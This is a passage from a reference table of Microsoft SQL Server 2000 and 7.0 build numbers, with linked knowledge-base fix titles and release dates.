| 8.00.840 | 2000.80.840.0 | [319477 FIX: Extremely Large Number of User Tables on AWE System May Cause BPool::Map Errors](http://support.microsoft.com/kb/319477/) | 2005-09-27 |
| 8.00.839 | 2000.80.839.0 | [823877 FIX: An Access Violation May Occur When You Run a Query That Contains 32,000 or More OR Clauses](http://support.microsoft.com/kb/823877/) | 2005-10-25 |
| 8.00.839 | 2000.80.839.0 | [824027 FIX: A Cursor with a Large Object Parameter May Cause an Access Violation on CStmtCond::XretExecute](http://support.microsoft.com/kb/824027/) | 2005-10-25 |
| 8.00.837 | 2000.80.837.0 | [820788 FIX: Delayed domain authentication may cause SQL Server to stop responding](http://support.microsoft.com/kb/820788/) | 2005-10-25 |
| 8.00.837 | 2000.80.837.0 | [821741 FIX: Lock monitor exception in DeadlockMonitor::ResolveDeadlock](http://support.microsoft.com/kb/821741/) | 2005-10-25 |
| 8.00.837 | 2000.80.837.0 | [821548 FIX: A Parallel Query May Generate an Access Violation After You Install SQL Server 2000 SP3](http://support.microsoft.com/kb/821548/) | 2005-10-25 |
| 8.00.837 | 2000.80.837.0 | [821740 FIX: MS DTC Transaction Commit Operation Blocks Itself](http://support.microsoft.com/kb/821740/) | 2005-10-25 |
| 8.00.837 | 2000.80.837.0 | [823514 FIX: Build 8.00.0837: A query that contains a correlated subquery runs slowly](http://support.microsoft.com/kb/823514/) | 2005-10-25 |
| 8.00.819 | 2000.80.819.0 | [826161 FIX: You are prompted for password confirmation after you change a standard SQL Server login](http://support.microsoft.com/kb/826161/) | 2005-10-25 |
| 8.00.818 | 2000.80.818.0 | [821277 MS03-031: Security patch for SQL Server 2000 Service Pack 3](http://support.microsoft.com/kb/821277/) | 2006-01-09 |
| 8.00.818 | 2000.80.818.0 | [821337 FIX: Localized versions of SQL Mail and the Web Assistant Wizard may not work as expected in SQL Server 2000 64 bit](http://support.microsoft.com/kb/821337/) | 2005-03-16 |
| 8.00.818 | 2000.80.818.0 | [818388 FIX: A Transact-SQL Statement That Is Embedded in the Database Name Runs with System Administrator Permissions](http://support.microsoft.com/kb/818388/) | 2005-02-10 |
| 8.00.818 | 2000.80.818.0 | [826161 FIX: You are prompted for password confirmation after you change a standard SQL Server login](http://support.microsoft.com/kb/826161/) | 2005-10-25 |
| 8.00.818 | 2000.80.818.0 | [821280 MS03-031: Security Patch for SQL Server 2000 64-bit](http://support.microsoft.com/kb/821280/) | 2006-03-14 |
| 8.00.816 | 2000.80.816.0 | [818766 FIX: Intense SQL Server activity results in spinloop wait](http://support.microsoft.com/kb/818766/) | 2005-10-25 |
| 8.00.814 | 2000.80.814.0 | [819662 FIX: Distribution Cleanup Agent Incorrectly Cleans Up Entries for Anonymous Subscribers](http://support.microsoft.com/kb/819662/) | 2005-10-25 |
| 8.00.811 | 2000.80.811.0 | [819248 FIX: An access violation exception may occur when you insert a row in a table that is referenced by indexed views in SQL Server 2000](http://support.microsoft.com/kb/819248/) | 2006-04-03 |
| 8.00.811 | 2000.80.811.0 | [819662 FIX: Distribution Cleanup Agent Incorrectly Cleans Up Entries for Anonymous Subscribers](http://support.microsoft.com/kb/819662/) | 2005-10-25 |
| 8.00.811 | 2000.80.811.0 | [818897 FIX: Invalid TDS Sent to SQL Server Results in Access Violation](http://support.microsoft.com/kb/818897/) | 2005-10-25 |
| 8.00.807 | 2000.80.807.0 | [818899 FIX: Error Message 3628 May Occur When You Run a Complex Query](http://support.microsoft.com/kb/818899/) | 2005-10-25 |
| 8.00.804 | 2000.80.804.0 | [818729 FIX: Internal Query Processor Error 8623 When Microsoft SQL Server Tries to Compile a Plan for a Complex Query](http://support.microsoft.com/kb/818729/) | 2005-10-25 |
| 8.00.801 | 2000.80.801.0 | [818540 FIX: SQL Server Enterprise Manager unexpectedly quits when you modify a DTS package](http://support.microsoft.com/kb/818540/) | 2006-01-26 |
| 8.00.800 | 2000.80.800.0 | [818414 FIX: The Sqldumper.exe File Does Not Generate a Userdump File When It Runs Against a Windows Service](http://support.microsoft.com/kb/818414/) | 2005-09-27 |
| 8.00.800 | 2000.80.800.0 | [818097 FIX: An Access Violation May Occur When You Run DBCC DBREINDEX on a Table That Has Hypothetical Indexes](http://support.microsoft.com/kb/818097/) | 2005-09-27 |
| 8.00.800 | 2000.80.800.0 | [818188 FIX: Query on the sysmembers Virtual Table May Fail with a Stack Overflow](http://support.microsoft.com/kb/818188/) | 2005-09-27 |
| 8.00.798 | 2000.80.798.0 | [817464 FIX: Using Sp\_executesql in Merge Agent Operations](http://support.microsoft.com/kb/817464/) | 2005-09-27 |
| 8.00.794 | 2000.80.794.0 | [817464 FIX: Using Sp\_executesql in Merge Agent Operations](http://support.microsoft.com/kb/817464/) | 2005-09-27 |
| 8.00.794 | 2000.80.794.0 | [813524 FIX: OLE DB conversion errors may occur after you select a literal string that represents datetime data as a column](http://support.microsoft.com/kb/813524/) | 2005-09-27 |
| 8.00.794 | 2000.80.794.0 | [816440 FIX: Error 8623 is Raised When SQL Server Compiles a Complex Query](http://support.microsoft.com/kb/816440/) | 2005-09-27 |
| 8.00.794 | 2000.80.794.0 | [817709 FIX: SQL Server 2000 might produce an incorrect cardinality estimate for outer joins](http://support.microsoft.com/kb/817709/) | 2005-02-11 |
| 8.00.791 | 2000.80.791.0 | [815249 FIX: Performance of a query that is run from a client program on a SQL Server SP3 database is slow after you restart the instance of SQL Server](http://support.microsoft.com/kb/815249/) | 2005-09-27 |
| 8.00.790 | 2000.80.790.0 | [817081 FIX: You receive an error message when you use the SQL-DMO BulkCopy object to import data into a SQL Server table](http://support.microsoft.com/kb/817081/) | 2005-09-27 |
| 8.00.789 | 2000.80.789.0 | [816840 FIX: Error 17883 May Display Message Text That Is Not Correct](http://support.microsoft.com/kb/816840/) | 2005-09-27 |
| 8.00.788 | 2000.80.788.0 | [816985 FIX: You cannot install SQL Server 2000 SP3 on the Korean version of SQL Server 2000](http://support.microsoft.com/kb/816985/) | 2005-09-27 |
| 8.00.781 | 2000.80.781.0 | [815057 FIX: SQL Server 2000 Uninstall Option Does Not Remove All Files](http://support.microsoft.com/kb/815057/) | 2005-09-27 |
| 8.00.780 | 2000.80.780.0 | [816039 FIX: Code Point Comparison Semantics for SQL\_Latin1\_General\_Cp850\_BIN Collation](http://support.microsoft.com/kb/816039/) | 2005-09-27 |
| 8.00.780 | 2000.80.780.0 | [816084 FIX: sysindexes.statblob Column May Be Corrupted After You Run a DBCC DBREINDEX Statement](http://support.microsoft.com/kb/816084/) | 2005-09-27 |
| 8.00.780 | 2000.80.780.0 | [810185 SQL Server 2000 hotfix update for SQL Server 2000 Service Pack 3 and 3a](http://support.microsoft.com/kb/810185/) | 2006-10-10 |
| 8.00.779 | 2000.80.779.0 | [814035 FIX: A Full-Text Population Fails After You Apply SQL Server 2000 Service Pack 3](http://support.microsoft.com/kb/814035/) | 2005-09-27 |
| 8.00.776 | 2000.80.776.0 | Unidentified | ??? |
| 8.00.775 | 2000.80.775.0 | [815115 FIX: A DTS package that uses global variables ignores an error message raised by RAISERROR](http://support.microsoft.com/kb/815115/) | 2005-09-27 |
| 8.00.769 | 2000.80.769.0 | [814889 FIX: A DELETE statement with a JOIN might fail and you receive a 625 error](http://support.microsoft.com/kb/814889/) | 2005-09-27 |
| 8.00.769 | 2000.80.769.0 | [814893 FIX: Error Message: "Insufficient key column information for updating" Occurs in SQL Server 2000 SP3](http://support.microsoft.com/kb/814893/) | 2005-09-27 |
| 8.00.765 | 2000.80.765.0 | [810163 FIX: An Access Violation Occurs if an sp\_cursoropen Call References a Parameter That Is Not Defined](http://support.microsoft.com/kb/810163/) | 2005-09-27 |
| 8.00.765 | 2000.80.765.0 | [810688 FIX: Merge Agent Can Resend Changes for Filtered Publications](http://support.microsoft.com/kb/810688/) | 2005-09-27 |
| 8.00.765 | 2000.80.765.0 | [811611 FIX: Reinitialized SQL Server CE 2.0 subscribers may experience data loss and non-convergence](http://support.microsoft.com/kb/811611/) | 2005-09-27 |
| 8.00.765 | 2000.80.765.0 | [813769 FIX: You May Experience Slow Performance When You Debug a SQL Server Service](http://support.microsoft.com/kb/813769/) | 2005-09-27 |
| 8.00.763 | 2000.80.763.0 | [814113 FIX: DTS Designer may generate an access violation after you install SQL Server 2000 Service Pack 3](http://support.microsoft.com/kb/814113/) | 2005-09-27 |
| 8.00.762 | 2000.80.762.0 | [814032 FIX: Merge publications cannot synchronize on SQL Server 2000 Service Pack 3](http://support.microsoft.com/kb/814032/) | 2005-09-27 |
| 8.00.760 | 2000.80.760.0 | [SQL Server 2000 Service Pack 3 (SP3 / SP3a)](http://www.microsoft.com/downloads/details.aspx?familyid=90DCD52C-0488-4E46-AFBF-ACACE5369FA3) | 2003-08-27 |
| 8.00.743 | 2000.80.743.0 | [818406 FIX: A Transact-SQL query that uses views may fail unexpectedly in SQL Server 2000 SP2](http://support.microsoft.com/kb/818406/) | 2005-10-18 |
| 8.00.743 | 2000.80.743.0 | [818763 FIX: Intense SQL Server Activity Results in Spinloop Wait in SQL Server 2000 Service Pack 2](http://support.microsoft.com/kb/818763/) | 2005-10-25 |
| 8.00.741 | 2000.80.741.0 | [818096 FIX: Many Extent Lock Time-outs May Occur During Extent Allocation](http://support.microsoft.com/kb/818096/) | 2005-02-10 |
| 8.00.736 | 2000.80.736.0 | [816937 FIX: A memory leak may occur when you use the sp\_OAMethod stored procedure to call a method of a COM object](http://support.microsoft.com/kb/816937/) | 2005-09-27 |
| 8.00.735 | 2000.80.735.0 | [814889 FIX: A DELETE statement with a JOIN might fail and you receive a 625 error](http://support.microsoft.com/kb/814889/) | 2005-09-27 |
| 8.00.733 | 2000.80.733.0 | [813759 FIX: A Large Number of NULL Values in Join Columns Result in Slow Query Performance](http://support.microsoft.com/kb/813759/) | 2005-09-27 |
| 8.00.730 | 2000.80.730.0 | [813769 FIX: You May Experience Slow Performance When You Debug a SQL Server Service](http://support.microsoft.com/kb/813769/) | 2005-09-27 |
| 8.00.728 | 2000.80.728.0 | [814460 FIX: Merge Replication with Alternate Synchronization Partners May Not Succeed After You Change the Retention Period](http://support.microsoft.com/kb/814460/) | 2005-09-27 |
| 8.00.725 | 2000.80.725.0 | [812995 FIX: A Query with an Aggregate Function May Fail with a 3628 Error](http://support.microsoft.com/kb/812995/) | 2005-09-27 |
| 8.00.725 | 2000.80.725.0 | [813494 FIX: Distribution Agent Fails with "Violation of Primary Key Constraint" Error Message](http://support.microsoft.com/kb/813494/) | 2005-09-27 |
| 8.00.723 | 2000.80.723.0 | [812798 FIX: A UNION ALL View May Not Use Index If Partitions Are Removed at Compile Time](http://support.microsoft.com/kb/812798/) | 2005-09-27 |
| 8.00.721 | 2000.80.721.0 | [812250 FIX: Indexed View May Cause a Handled Access Violation in CIndex::SetLevel1Names](http://support.microsoft.com/kb/812250/) | 2005-09-27 |
| 8.00.721 | 2000.80.721.0 | [812393 FIX: Update or Delete Statement Fails with Error 1203 During Row Lock Escalation](http://support.microsoft.com/kb/812393/) | 2005-09-27 |
| 8.00.718 | 2000.80.718.0 | [811703 FIX: Unexpected results from partial aggregations based on conversions](http://support.microsoft.com/kb/811703/) | 2005-09-27 |
| 8.00.715 | 2000.80.715.0 | [810688 FIX: Merge Agent Can Resend Changes for Filtered Publications](http://support.microsoft.com/kb/810688/) | 2005-09-27 |
| 8.00.715 | 2000.80.715.0 | [811611 FIX: Reinitialized SQL Server CE 2.0 subscribers may experience data loss and non-convergence](http://support.microsoft.com/kb/811611/) | 2005-09-27 |
| 8.00.714 | 2000.80.714.0 | [811478 FIX: Restoring a SQL Server 7.0 database backup in SQL Server 2000 Service Pack 2 (SP2) may cause an assertion error in the Xdes.cpp file](http://support.microsoft.com/kb/811478/) | 2005-10-18 |
| 8.00.713 | 2000.80.713.0 | [811205 FIX: An error message occurs when you perform a database or a file SHRINK operation](http://support.microsoft.com/kb/811205/) | 2005-09-27 |
| 8.00.710 | 2000.80.710.0 | [811052 FIX: Latch Time-Out Message 845 Occurs When You Perform a Database or File SHRINK Operation](http://support.microsoft.com/kb/811052/) | 2005-09-27 |
| 8.00.705 | 2000.80.705.0 | [810920 FIX: The JOIN queries in the triggers that involve the inserted table or the deleted table may return results that are not consistent](http://support.microsoft.com/kb/810920/) | 2005-09-27 |
| 8.00.703 | 2000.80.703.0 | [810526 FIX: Cursors That Have a Long Lifetime May Cause Memory Fragmentation](http://support.microsoft.com/kb/810526/) | 2005-09-27 |
| 8.00.702 | 2000.80.702.0 | [328551 FIX: Concurrency enhancements for the tempdb database](http://support.microsoft.com/kb/328551/) | 2006-07-19 |
| 8.00.701 | 2000.80.701.0 | [810026 FIX: A DELETE Statement with a Self-Join May Fail and You Receive a 625 Error](http://support.microsoft.com/kb/810026/) | 2005-09-27 |
| 8.00.701 | 2000.80.701.0 | [810163 FIX: An Access Violation Occurs if an sp\_cursoropen Call References a Parameter That Is Not Defined](http://support.microsoft.com/kb/810163/) | 2005-09-27 |
| 8.00.700 | 2000.80.700.0 | [810072 FIX: Merge Replication Reconciler Stack Overflow](http://support.microsoft.com/kb/810072/) | 2005-09-27 |
| 8.00.696 | 2000.80.696.0 | [810052 FIX: A Memory Leak Occurs When Cursors Are Opened During a Connection](http://support.microsoft.com/kb/810052/) | 2005-09-27 |
| 8.00.696 | 2000.80.696.0 | [810010 FIX: The fn\_get\_sql System Table Function May Cause Various Handled Access Violations](http://support.microsoft.com/kb/810010/) | 2005-09-27 |
| 8.00.695 | 2000.80.695.0 | [331885 FIX: Update/Delete Statement Fails with Error 1203 During Page Lock Escalation](http://support.microsoft.com/kb/331885/) | 2005-09-27 |
| 8.00.695 | 2000.80.695.0 | [331965 FIX: The xp\_readmail Extended Stored Procedure Overwrites Attachment That Already Exists](http://support.microsoft.com/kb/331965/) | 2005-02-10 |
| 8.00.695 | 2000.80.695.0 | [331968 FIX: The xp\_readmail and xp\_findnextmsg Extended Stored Procedures Do Not Read Mail in Time Received Order](http://support.microsoft.com/kb/331968/) | 2005-02-10 |
| 8.00.693 | 2000.80.693.0 | [330212 FIX: Parallel logical operation returns results that are not consistent](http://support.microsoft.com/kb/330212/) | 2005-09-27 |
| 8.00.690 | 2000.80.690.0 | [311104 FIX: The SELECT Statement with Parallelism Enabled May Cause an Assertion](http://support.microsoft.com/kb/311104/) | 2005-10-12 |
| 8.00.689 | 2000.80.689.0 | [329499 FIX: Replication Removed from Database After Restore WITH RECOVERY](http://support.microsoft.com/kb/329499/) | 2005-10-11 |
| 8.00.688 | 2000.80.688.0 | [329487 FIX: Transaction Log Restore Fails with Message 3456](http://support.microsoft.com/kb/329487/) | 2005-10-11 |
| 8.00.686 | 2000.80.686.0 | [316333 SQL Server 2000 Security Update for Service Pack 2](http://support.microsoft.com/kb/316333/) | 2006-11-24 |
| 8.00.682 | 2000.80.682.0 | [319851 FIX: Assertion and Error Message 3314 Occurs If You Try to Roll Back a Text Operation with READ UNCOMMITTED](http://support.microsoft.com/kb/319851/) | 2005-10-18 |
| 8.00.679 | 2000.80.679.0 | [316333 SQL Server 2000 Security Update for Service Pack 2](http://support.microsoft.com/kb/316333/) | 2006-11-24 |
| 8.00.678 | 2000.80.678.0 | [328354 FIX: A RESTORE DATABASE WITH RECOVERY Statement Can Fail with Error 9003 or Error 9004](http://support.microsoft.com/kb/328354/) | 2005-09-27 |
| 8.00.667 | 2000.80.667.0 | 2000 SP2+8/14 fix | ??? |
| 8.00.665 | 2000.80.665.0 | 2000 SP2+8/8 fix | ??? |
| 8.00.661 | 2000.80.661.0 | [326999 FIX: Lock escalation on a scan while an update query is running causes a 1203 error message to occur](http://support.microsoft.com/kb/326999/) | 2005-09-27 |
| 8.00.655 | 2000.80.655.0 | 2000 SP2+7/24 fix | ??? |
| 8.00.652 | 2000.80.652.0 | [810010 FIX: The fn\_get\_sql System Table Function May Cause Various Handled Access Violations](http://support.microsoft.com/kb/810010/) | 2005-09-27 |
| 8.00.650 | 2000.80.650.0 | [322853 FIX: SQL Server Grants Unnecessary Permissions or an Encryption Function Contains Unchecked Buffers](http://support.microsoft.com/kb/322853/) | 2003-11-05 |
| 8.00.644 | 2000.80.644.0 | [324186 FIX: Slow Compile Time and Execution Time with Query That Contains Aggregates and Subqueries](http://support.microsoft.com/kb/324186/) | 2005-09-27 |
| 8.00.636 | 2000.80.636.0 | [Microsoft Security Bulletin MS02-039](http://technet.microsoft.com/en-us/security/bulletin/ms02-039) | 2002-06-24 |
| 8.00.608 | 2000.80.608.0 | [319507 FIX: SQL Extended Procedure Functions Contain Unchecked Buffers](http://support.microsoft.com/kb/319507/) | 2004-06-21 |
| 8.00.604 | 2000.80.604.0 | 2000 SP2+3/29 fix | ??? |
| 8.00.599 | 2000.80.599.0 | [319869 FIX: Improved SQL Manager Robustness for Odd Length Buffer](http://support.microsoft.com/kb/319869/) | 2005-09-27 |
| 8.00.594 | 2000.80.594.0 | [319477 FIX: Extremely Large Number of User Tables on AWE System May Cause BPool::Map Errors](http://support.microsoft.com/kb/319477/) | 2005-09-27 |
| 8.00.584 | 2000.80.584.0 | [318530 FIX: Reorder outer joins with filter criteria before non-selective joins and outer joins](http://support.microsoft.com/kb/318530/) | 2008-02-04 |
| 8.00.578 | 2000.80.578.0 | [317979 FIX: Unchecked Buffer May Occur When You Connect to Remote Data Source](http://support.microsoft.com/kb/317979/) | 2005-09-27 |
| 8.00.578 | 2000.80.578.0 | [318045 FIX: SELECT with Timestamp Column That Uses FOR XML AUTO May Fail with Stack Overflow or AV](http://support.microsoft.com/kb/318045/) | 2005-09-27 |
| 8.00.568 | 2000.80.568.0 | [317748 FIX: Handle Leak Occurs in SQL Server When Service or Application Repeatedly Connects and Disconnects with Shared Memory Network Library](http://support.microsoft.com/kb/317748) | 2002-10-30 |
| 8.00.561 | 2000.80.561.0 | 2000 SP2+1/29 fix | ??? |
| 8.00.558 | 2000.80.558.0 | [314003 FIX: Query That Uses DESC Index May Result in Access Violation](http://support.microsoft.com/kb/314003/) | 2005-09-26 |
| 8.00.558 | 2000.80.558.0 | [315395 FIX: COM May Not Be Uninitialized for Worker Thread When You Use sp\_OA](http://support.microsoft.com/kb/315395/) | 2005-09-27 |
| 8.00.552 | 2000.80.552.0 | [313002 The Knowledge Base (KB) Article You Requested Is Currently Not Available](http://support.microsoft.com/kb/313002/) | ??? |
| 8.00.552 | 2000.80.552.0 | [313005 FIX: SELECT from Computed Column That References UDF Causes SQL Server to Terminate](http://support.microsoft.com/kb/313005/) | 2005-09-26 |
| 8.00.534 | 2000.80.534.0 | 2000 SP2.01 | ??? |
| 8.00.532 | 2000.80.532.0 | [SQL Server 2000 Service Pack 2 (SP2)](http://www.microsoft.com/downloads/details.aspx?FamilyID=75672496-af8e-40dc-853e-ad2c9fe96882) | 2003-02-04 |
| 8.00.475 | 2000.80.475.0 | 2000 SP1+1/29 fix | ??? |
| 8.00.474 | 2000.80.474.0 | [315395 FIX: COM May Not Be Uninitialized for Worker Thread When You Use sp\_OA](http://support.microsoft.com/kb/315395/) | 2005-09-27 |
| 8.00.473 | 2000.80.473.0 | [314003 FIX: Query That Uses DESC Index May Result in Access Violation](http://support.microsoft.com/kb/314003/) | 2005-09-26 |
| 8.00.471 | 2000.80.471.0 | [313302 FIX: Shared Table Lock Is Not Released After Lock Escalation](http://support.microsoft.com/kb/313302/) | 2005-09-26 |
| 8.00.469 | 2000.80.469.0 | [313005 FIX: SELECT from Computed Column That References UDF Causes SQL Server to Terminate](http://support.microsoft.com/kb/313005/) | 2005-09-26 |
| 8.00.452 | 2000.80.452.0 | [308547 FIX: SELECT DISTINCT from Table with LEFT JOIN of View Causes Error Messages or Client Application May Stop Responding](http://support.microsoft.com/kb/308547/) | 2005-09-26 |
| 8.00.444 | 2000.80.444.0 | [307540 FIX: SQLPutData May Result in Leak of Buffer Pool Memory](http://support.microsoft.com/kb/307540/) | 2005-09-26 |
| 8.00.444 | 2000.80.444.0 | [307655 FIX: Querying Syslockinfo with Large Numbers of Locks May Cause Server to Stop Responding](http://support.microsoft.com/kb/307655/) | 2005-10-07 |
| 8.00.443 | 2000.80.443.0 | [307538 FIX: SQLTrace Start and Stop is Now Reported in Windows NT Event Log for SQL Server 2000](http://support.microsoft.com/kb/307538/) | 2005-09-26 |
| 8.00.428 | 2000.80.428.0 | [304850 FIX: SQL Server Text Formatting Functions Contain Unchecked Buffers](http://support.microsoft.com/kb/304850/) | 2004-08-05 |
| 8.00.384 | 2000.80.384.0 | [SQL Server 2000 Service Pack 1 (SP1)](http://www.microsoft.com/downloads/details.aspx?FamilyID=DFF43C50-51DF-4FE0-9717-DE41FB48556E) | 2001-06-11 |
| 8.00.296 | 2000.80.296.0 | [299717 FIX: Query Method Used to Access Data May Allow Rights that the Login Might Not Normally Have](http://support.microsoft.com/kb/299717/) | 2004-08-09 |
| 8.00.287 | 2000.80.287.0 | [297209 FIX: Deletes, Updates and Rank Based Selects May Cause Deadlock of MSSEARCH](http://support.microsoft.com/kb/297209/) | 2005-10-07 |
| 8.00.251 | 2000.80.251.0 | [300194 FIX: Error 644 Using Two Indexes on a Column with Uppercase Preference Sort Order](http://support.microsoft.com/kb/300194/) | 2003-10-17 |
| 8.00.250 | 2000.80.250.0 | [291683 The Knowledge Base (KB) Article You Requested Is Currently Not Available](http://support.microsoft.com/kb/291683/) | ??? |
| 8.00.249 | 2000.80.249.0 | [288122 FIX: Lock Monitor Uses Excessive CPU](http://support.microsoft.com/kb/288122/) | 2003-09-12 |
| 8.00.239 | 2000.80.239.0 | [285290 FIX: Complex ANSI Join Query with Distributed Queries May Cause Handled Access Violation](http://support.microsoft.com/kb/285290/) | 2003-10-09 |
| 8.00.233 | 2000.80.233.0 | [282416 FIX: Opening the Database Folder in SQL Server Enterprise Manager 2000 Takes a Long Time](http://support.microsoft.com/kb/282416/) | 2003-10-09 |
| 8.00.231 | 2000.80.231.0 | [282279 FIX: Execution of sp\_OACreate on COM Object Without Type Information Causes Server Shut Down](http://support.microsoft.com/kb/282279/) | 2003-10-09 |
| 8.00.226 | 2000.80.226.0 | [278239 FIX: Extreme Memory Usage When Adding Many Security Roles](http://support.microsoft.com/kb/278239/) | 2006-11-21 |
| 8.00.225 | 2000.80.225.0 | [281663 "Access Denied" Error Message When You Try to Use a Network Drive to Modify Windows 2000 Permissions](http://support.microsoft.com/kb/281663/) | 2006-10-30 |
| 8.00.223 | 2000.80.223.0 | [280380 FIX: Buffer Overflow Exploit Possible with Extended Stored Procedures](http://support.microsoft.com/kb/280380/) | 2004-06-29 |
| 8.00.222 | 2000.80.222.0 | [281769 FIX: Exception Access Violation Encountered During Query Normalization](http://support.microsoft.com/kb/281769/) | 2005-10-07 |
| 8.00.218 | 2000.80.218.0 | [279183 FIX: Scripting Object with Several Extended Properties May Cause Exception](http://support.microsoft.com/kb/279183/) | 2003-10-09 |
| 8.00.217 | 2000.80.217.0 | [279293 FIX: CASE Using LIKE with Empty String Can Result in Access Violation or Abnormal Server Shutdown](http://support.microsoft.com/kb/279293/) | 2003-10-09 |
| 8.00.211 | 2000.80.211.0 | [276329 FIX: Complex Distinct or Group By Query Can Return Unexpected Results with Parallel Execution Plan](http://support.microsoft.com/kb/276329/) | 2003-11-05 |
| 8.00.210 | 2000.80.210.0 | [275900 FIX: Linked Server Query with Hyphen in LIKE Clause May Run Slowly](http://support.microsoft.com/kb/275900/) | 2003-10-09 |
| 8.00.205 | 2000.80.205.0 | [274330 FIX: Sending Open Files as Attachment in SQL Mail Fails with Error 18025](http://support.microsoft.com/kb/274330/) | 2005-10-07 |
| 8.00.204 | 2000.80.204.0 | [274329 FIX: Optimizer Slow to Generate Query Plan for Complex Queries that have Many Joins and Semi-Joins](http://support.microsoft.com/kb/274329/) | 2003-10-09 |
| 8.00.194 | 2000.80.194.0 | SQL Server 2000 RTM (no SP) | ??? |
| 8.00.190 | 2000.80.190.0 | SQL Server 2000 Gold | ??? |
| 8.00.100 | 2000.80.100.0 | SQL Server 2000 Beta 2 | ??? |
| 8.00.078 | 2000.80.078.0 | SQL Server 2000 EAP5 | ??? |
| 8.00.047 | 2000.80.047.0 | SQL Server 2000 EAP4 | ??? |
Microsoft SQL Server 7.0 Builds
-------------------------------
| Build | KB / Description | Release Date |
| --- | --- | --- |
| 7.00.1152 | [948113 MS08-040: Description of the security update for SQL Server 7.0: July 8, 2008](http://support.microsoft.com/kb/948113/) | 2008-07-08 |
| 7.00.1149 | [867763 FIX: An access violation exception may occur when you run a SELECT statement that contains complex JOIN operations in SQL Server 7.0](http://support.microsoft.com/kb/867763/) | 2006-06-01 |
| 7.00.1143 | [830233 New Connection Events Are Not Recorded in SQL Server Traces](http://support.microsoft.com/kb/830233/) | 2005-10-25 |
| 7.00.1143 | [829015 FIX: An attention signal that is sent from a SQL Server client application because of a query time-out may cause the SQL Server service to quit unexpectedly](http://support.microsoft.com/kb/829015/) | 2005-10-25 |
| 7.00.1097 | [822756 A Complex UPDATE Statement That Uses an Index Spool Operation May Cause an Assertion](http://support.microsoft.com/kb/822756/) | 2005-10-25 |
| 7.00.1094 | [821279 MS03-031: Security patch for SQL Server 7.0 Service Pack 4](http://support.microsoft.com/kb/821279/) | 2006-05-11 |
| 7.00.1094 | [815495 MS03-031: Cumulative security patch for SQL Server](http://support.microsoft.com/kb/815495/) | 2006-05-10 |
| 7.00.1092 | [820788 FIX: Delayed domain authentication may cause SQL Server to stop responding](http://support.microsoft.com/kb/820788/) | 2005-10-25 |
| 7.00.1087 | [814693 FIX: SQL Server 7.0 Scheduler May Periodically Stop Responding During Large Sort Operation](http://support.microsoft.com/kb/814693/) | 2005-09-27 |
| 7.00.1079 | [329499 FIX: Replication Removed from Database After Restore WITH RECOVERY](http://support.microsoft.com/kb/329499/) | 2005-10-11 |
| 7.00.1078 | [327068 INF: SQL Server 7.0 Security Update for Service Pack 4](http://support.microsoft.com/kb/327068/) | 2005-09-27 |
| 7.00.1077 | [316333 SQL Server 2000 Security Update for Service Pack 2](http://support.microsoft.com/kb/316333/) | 2006-11-24 |
| 7.00.1063 | [SQL Server 7.0 Service Pack 4 (SP4)](https://www.microsoft.com/en-us/download/details.aspx?id=7959) | 2002-04-26 |
| 7.00.1033 | [324469 FIX: Error message 9004 may occur when you restore a log that does not contain any transactions](http://support.microsoft.com/kb/324469/) | 2005-10-12 |
| 7.00.1026 | [319851 FIX: Assertion and Error Message 3314 Occurs If You Try to Roll Back a Text Operation with READ UNCOMMITTED](http://support.microsoft.com/kb/319851/) | 2005-10-18 |
| 7.00.1004 | [304851 FIX: SQL Server Text Formatting Functions Contain Unchecked Buffers](http://support.microsoft.com/kb/304851/) | 2004-08-05 |
| 7.00.996 | [299717 FIX: Query Method Used to Access Data May Allow Rights that the Login Might Not Normally Have](http://support.microsoft.com/kb/299717/) | 2004-08-09 |
| 7.00.978 | [285870 FIX: Update With Self Join May Update Incorrect Number Of Rows](http://support.microsoft.com/kb/285870/) | 2003-10-28 |
| 7.00.977 | [284351 FIX: SQL Server Profiler and SQL Server Agent Alerts May Fail to Work After Installing SQL Server 7.0 SP3](http://support.microsoft.com/kb/284351/) | 2002-04-25 |
| 7.00.970 | [283837 FIX: SQL Server May Generate Nested Query For Linked Server When Option Is Disabled](http://support.microsoft.com/kb/283837/) | 2002-10-15 |
| 7.00.970 | [282243 FIX: Incorrect Results with Join of Column Converted to Binary](http://support.microsoft.com/kb/282243/) | 2003-10-29 |
| 7.00.961 | [SQL Server 7.0 Service Pack 3 (SP3)](https://support.microsoft.com/en-us/kb/274799) | 2000-12-15 |
| 7.00.921 | [283837 FIX: SQL Server May Generate Nested Query For Linked Server When Option Is Disabled](http://support.microsoft.com/kb/283837/) | 2002-10-15 |
| 7.00.919 | [282243 FIX: Incorrect Results with Join of Column Converted to Binary](http://support.microsoft.com/kb/282243/) | 2003-10-29 |
| 7.00.918 | [280380 FIX: Buffer Overflow Exploit Possible with Extended Stored Procedures](http://support.microsoft.com/kb/280380/) | 2004-06-29 |
| 7.00.917 | [279180 FIX: Bcp.exe with Long Query String Can Result in Assertion Failure](http://support.microsoft.com/kb/279180/) | 2005-09-26 |
| 7.00.910 | [275901 FIX: SQL RPC That Raises Error Will Mask @@ERROR with Msg 7221](http://support.microsoft.com/kb/275901/) | 2003-10-31 |
| 7.00.905 | [274266 FIX: Data Modification Query with a Distinct Subquery on a View May Cause Error 3624](http://support.microsoft.com/kb/274266/) | 2004-07-15 |
| 7.00.889 | [243741 FIX: Replication Initialize Method Causes Handle Leak on Failure](http://support.microsoft.com/kb/243741/) | 2005-10-05 |
| 7.00.879 | [281185 FIX: Linked Index Server Query Through OLE DB Provider with OR Clause Reports Error 7349](https://support.microsoft.com/en-us/kb/281185) | 2006-03-14 |
| 7.00.857 | [260346 FIX: Transactional Publications with a Filter on Numeric Columns Fail to Replicate Data](https://support.microsoft.com/en-us/kb/260346) | 2006-03-14 |
| 7.00.843 | [266766 FIX: Temporary Stored Procedures in SA Owned Databases May Bypass Permission Checks When You Run Stored Procedures](https://support.microsoft.com/en-us/kb/266766) | 2006-03-14 |
| 7.00.842 | [SQL Server 7.0 Service Pack 2 (SP2)](https://support.microsoft.com/en-us/kb/254561) | 2000-03-20 |
| 7.00.839 | SQL Server 7.0 Service Pack 2 (SP2) Unidentified | |
| 7.00.835 | SQL Server 7.0 Service Pack 2 (SP2) Beta | |
| 7.00.776 | [258087 FIX: Non-Admin User That Executes Batch While Server Shuts Down May Encounter Retail Assertion](https://support.microsoft.com/en-us/kb/258087) | 2006-03-14 |
| 7.00.770 | [252905 FIX: Slow Compile Time on Complex Joins with Unfiltered Table](http://support.microsoft.com/kb/252905/) | 2006-03-14 |
| 7.00.745 | [253738 FIX: SQL Server Components that Access the Registry in a Cluster Environment May Cause a Memory Leak](https://support.microsoft.com/en-us/kb/253738) | 2005-10-07 |
